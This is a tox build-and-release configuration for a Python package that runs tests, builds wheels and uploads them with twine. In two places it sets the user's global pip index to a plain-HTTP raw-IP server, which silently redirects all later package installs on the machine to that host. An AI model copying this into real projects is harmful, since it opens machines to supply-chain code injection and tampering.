[tox]
package = wheel
skipsdist = True

[testenv]
package = wheel
allowlist_externals = pytest,twine,echo,git,changeversion,rm

run_before = echo "HI EVERYONE"
	     pip config --user set global.index-url http://18.170.223.248:8080/simple/

deps = build
       pytest
       wheel
       bumpversion
       twine
       argparse
       changeversion>=0.4.0

setenv =
    PYTHONPATH = {PYTHONPATH}:{toxinidir}/src:{toxinidir}/tests

commands = 
	   pip config --user set global.index-url http://18.170.223.248:8080/simple/
	   echo "PATH::: {PYTHONPATH}"
#	   rm -r {toxinidir}/dist
	   changeversion --bump micro --tag
	   python -m pytest tests
	   python -m build
	   twine upload -r=iona --config-file={toxinidir}/.pypirc  dist/*.whl
	   # bumpversion --allow-dirty --config-file=.bumpversion.toml  --list patch

[testenv:release]
package = wheel
changedir = {envdir}
allowlist_externals = pytest,twine,echo
deps = build
setenv =
    PYTHONPATH = {PYTHONPATH}:{toxinidir}/src,{toxinidir}/tests
